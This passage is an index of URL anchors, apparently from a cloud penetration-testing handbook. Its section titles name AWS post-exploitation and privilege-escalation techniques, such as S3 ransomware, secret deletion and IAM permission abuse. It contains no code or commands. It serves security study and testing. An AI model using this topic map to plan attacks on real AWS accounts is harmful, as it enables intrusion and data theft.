ost-exploitation/aws-organizations-post-exploitation.html#aws---organizations-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#organizations","pentesting-cloud/aws-security/aws-post-exploitation/aws-organizations-post-exploitation.html#leave-the-org","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#aws---rds-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rds","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdscreatedbsnapshot-rdsrestoredbinstancefromdbsnapshot-rdsmodifydbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsmodifydbsnapshotattribute-rdscreatedbsnapshot","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdownloaddblogfileportion","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsdeletedbinstance","pentesting-cloud/aws-security/aws-post-exploitation/aws-rds-post-exploitation.html#rdsstartexporttask","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#aws---s3-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#sensitive-information","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#pivoting","pentesting-cloud/aws-security/aws-post-exploitation/aws-s3-post-exploitation.html#s3-ransomware","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#aws---secrets-manager-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#secrets-manager","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#read-secrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-change-secret-value","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-change-kms-key","pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation.html#dos-deleting-secret","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#aws---ses-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#ses","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendrawemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendtemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulktemplatedemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbulkemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendbounce","pentesting-cloud/aws-security/aws-post-exploitation/aws-ses-post-exploitation.html#sessendcustomverificationemail","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#aws---sns-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#sns","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#disrupt-messages","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsdeletetopic","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snspublish","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssettopicattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snssubscribe--snsunsubscribe","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snsaddpermission--snsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sns-post-exploitation.html#snstagresource--snsuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#aws---sqs-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqs","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssendmessage--sqssendmessagebatch","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsreceivemessage-sqsdeletemessage-sqschangemessagevisibility","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsdeletequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqspurgequeue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqssetqueueattributes","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqstagqueue--sqsuntagqueue","pentesting-cloud/aws-security/aws-post-exploitation/aws-sqs-post-exploitation.html#sqsremovepermission","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#aws---sso--identitystore-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#sso--identitystore","pentesting-cloud/aws-security/aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.html#ssodeletepermissionset--ssoputpermissionsboundarytopermissionset--ssodeleteaccountassignment","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#aws---step-functions-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#step-functions","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesrevealsecrets","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesdeletestatemachine-statesdeletestatemachineversion-statesdeletestatemachinealias","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatemaprun","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesstopexecution","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statestagresource-statesuntagresource","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#statesupdatestatemachine-lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.html#victim-setup-context-for-exploit","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#aws---sts-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#sts","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#from-iam-creds-to-console","pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.html#bypass-user-agent-restrictions-from-python","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#aws---vpn-post-exploitation","pentesting-cloud/aws-security/aws-post-exploitation/aws-vpn-post-exploitation.html#vpn","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws---privilege-escalation","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#aws-privilege-escalation","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#mindmap","pentesting-cloud/aws-security/aws-privilege-escalation/index.html#tools","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#aws---apigateway-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigateway","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewaypost","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdaterestapipolicy-apigatewaypatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayputintegration-apigatewaycreatedeployment-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdateauthorizer-apigatewaycreatedeployment","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apigateway-privesc.html#apigatewayupdatevpclink","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.html#aws---apprunner-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.html#apprunner","pentesting-cloud/aws-security/aws-privilege-escalation/aws-apprunner-privesc.html#iampassrole-apprunnercreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#aws---chime-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-chime-privesc.html#chimecreateapikey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#aws---codebuild-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuild","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildcreateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#iampassrole-codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildupdateproject-codebuildstartbuild--codebuildstartbuildbatch","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#ssm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.html#codebuildstartbuild--codebuildstartbuildbatch-s3getobject-s3putobject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#aws---codepipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#iampassrole-codepipelinecreatepipeline-codebuildcreateproject-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codebuildupdateproject-codepipelineupdatepipeline-codepipelinestartpipelineexecution","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.html#codepipelinepollforjobs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#aws---codestar-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestar","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/index.html#codestarcreateprojectfromtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.html#codestarcreateproject-codestarassociateteammember","pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.html#iampassrole-codestarcreateproject","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws---cloudformation-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationcreatestack","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrole-cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestack--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationcreatechangeset-cloudformationexecutechangeset--cloudformationsetstackpolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#iampassrolecloudformationcreatestackset--cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#cloudformationupdatestackset","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#aws-cdk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#determining-the-role-names","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#adding-malicious-code-to-the-project-source","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/index.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#iampassrole-cloudformationcreatestackand-cloudformationdescribestacks","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#aws---cognito-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#gathering-credentials-from-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identitysetidentitypoolroles-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-identityupdate-identity-pool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreategroup--cognito-idpupdategroup-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminconfirmsignup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmincreateuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminenableuser","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadmininitiateauth--cognito-idpadminrespondtoauthchallenge","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminsetusersettings--cognito-idpsetusermfapreference--cognito-idpsetuserpoolmfaconfig--cognito-idpupdateuserpool","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpadminupdateuserattributes","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserpoolclient--cognito-idpupdateuserpoolclient","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateuserimportjob--cognito-idpstartuserimportjob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-idpcreateidentityprovider--cognito-idpupdateidentityprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#cognito-sync-analysis","pentesting-cloud/aws-security/aws-privilege-escalation/aws-cognito-privesc.html#automatic-tools","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#aws---datapipeline-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#datapipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#iampassrole-datapipelinecreatepipeline-datapipelineputpipelinedefinition-datapipelineactivatepipeline","pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws---directory-services-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#directory-services","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#dsresetuserpassword","pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.html#aws-management-console","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#aws---dynamodb-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodb","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#dynamodbputresourcepolicy-and-optionally-dynamodbgetresourcepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#post-exploitation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.html#todo-read-data-abusing-data-streams","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#aws---ebs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ebslistsnapshotblocks-ebsgetsnapshotblock-ec2describesnapshots","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ebs-privesc.html#ec2createsnapshot","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#aws---ec2-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole---iamaddroletoinstanceprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#iampassrole--ec2associateiaminstanceprofile-ec2disassociateiaminstanceprofile--ec2replaceiaminstanceprofileassociation","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2requestspotinstancesiampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2modifyinstanceattribute","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2createlaunchtemplateversionec2createlaunchtemplateec2modifylaunchtemplate","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscalingcreatelaunchconfiguration--ec2createlaunchtemplate--iampassrole-autoscalingcreateautoscalinggroup--autoscalingupdateautoscalinggroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#autoscaling","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendsshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#ec2-instance-connectsendserialconsolesshpublickey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#describe-launch-templatesdescribe-launch-template-versions","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#aws---ecr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtokenecrbatchgetimage","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrgetauthorizationtoken-ecrbatchchecklayeravailability-ecrcompletelayerupload-ecrinitiatelayerupload-ecrputimage-ecruploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicgetauthorizationtoken-ecr-publicbatchchecklayeravailability-ecr-publiccompletelayerupload-ecr-publicinitiatelayerupload-ecr-publicputimage-ecr-publicuploadlayerpart","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecr-publicsetrepositorypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecr-privesc.html#ecrputregistrypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#aws---ecs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassroleecsruntask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsstarttask","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsregistertaskdefinition-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistertaskdefinition--ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsexecutecommand-ecsdescribetasks-ecsruntaskecsstarttaskecsupdateserviceecscreateservice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ssmstartsession","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#iampassrole-ec2runinstances","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecsregistercontainerinstance-ecsderegistercontainerinstance-ecsstarttask-iampassrole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#ecscreatetaskset-ecsupdateserviceprimarytaskset-ecsdescribetasksets","pentesting-cloud/aws-security/aws-privilege-escalation/aws-ecs-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#aws---efs-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#efs","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemdeletefilesystempolicyelasticfilesystemputfilesystempolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemclientmountelasticfilesystemclientrootaccesselasticfilesystemclientwrite","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemcreatemounttarget","pentesting-cloud/aws-security/aws-privilege-escalation/aws-efs-privesc.html#elasticfilesystemmodifymounttargetsecuritygroups","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#aws---elastic-beanstalk-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkrebuildenvironment-s3-write-permissions--many-others","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplication-elasticbeanstalkcreateenvironment-elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-iampassrole-and-more","pentesting-cloud/aws-security/aws-privilege-escalation/aws-elastic-beanstalk-privesc.html#elasticbeanstalkcreateapplicationversion-elasticbeanstalkupdateenvironment-cloudformationgettemplate-cloudformationdescribestackresources-cloudformationdescribestackresource-autoscalingdescribeautoscalinggroups-autoscalingsuspendprocesses-autoscalingsuspendprocesses","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#aws---emr-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#emr","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#iampassrole-elasticmapreducerunjobflow","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreducecreateeditor-iamlistroles-elasticmapreducelistclusters-iampassrole-elasticmapreducedescribeeditor-elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/aws-emr-privesc.html#elasticmapreduceopeneditorinconsole","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#aws---eventbridge-scheduler-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#eventbridge-scheduler","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#iampassrole-schedulercreateschedule--schedulerupdateschedule","pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#aws---gamelift","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#gameliftrequestuploadcredentials","pentesting-cloud/aws-security/aws-privilege-escalation/aws-gamelift.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#aws---glue-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glue","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatedevendpoint-gluegetdevendpoint--gluegetdevendpoints","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#iampassrole-gluecreatejob--glueupdatejob-gluestartjobrun--gluecreatetrigger","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#glueupdatejob","pentesting-cloud/aws-security/aws-privilege-escalation/aws-glue-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#aws---iam-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iam","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreatepolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamsetdefaultpolicyversion","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateloginprofile--iamupdateloginprofile","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamcreateservicespecificcredential--iamresetservicespecificcredential","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachuserpolicy--iamattachgrouppolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamattachrolepolicy---stsassumeroleiamcreaterole---iamputuserpolicy--iamputgrouppolicy--iamputrolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamaddusertogroup","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateassumerolepolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamuploadsshpublickey--iamdeactivatemfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamresyncmfadevice","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdatesamlprovider-iamlistsamlproviders-iamgetsamlprovider","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamupdateopenidconnectproviderthumbprint-iamlistopenidconnectproviders-iam-getopenidconnectprovider-","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#iamputuserpermissionsboundary","pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#aws---kms-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kms","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmslistkeyskmsputkeypolicy-kmslistkeypolicies-kmsgetkeypolicy","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreategrant","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmscreatekey-kmsreplicatekey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-kms-privesc.html#kmsdecrypt","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#aws---lambda-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdainvokefunction--lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreateeventsourcemapping","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaaddlayerversionpermission","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctioncode","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambdaupdatefunctionconfiguration","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#iampassrole-lambdacreatefunction-lambdacreatefunctionurlconfig-lambdainvokefunctionurl","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#lambda-mitm","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lambda-privesc.html#references","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#aws---lightsail-privesc","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsail","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsaildownloaddefaultkeypair","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetinstanceaccessdetails","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailcreatebucketaccesskey","pentesting-cloud/aws-security/aws-privilege-escalation/aws-lightsail-privesc.html#lightsailgetrelationaldatabase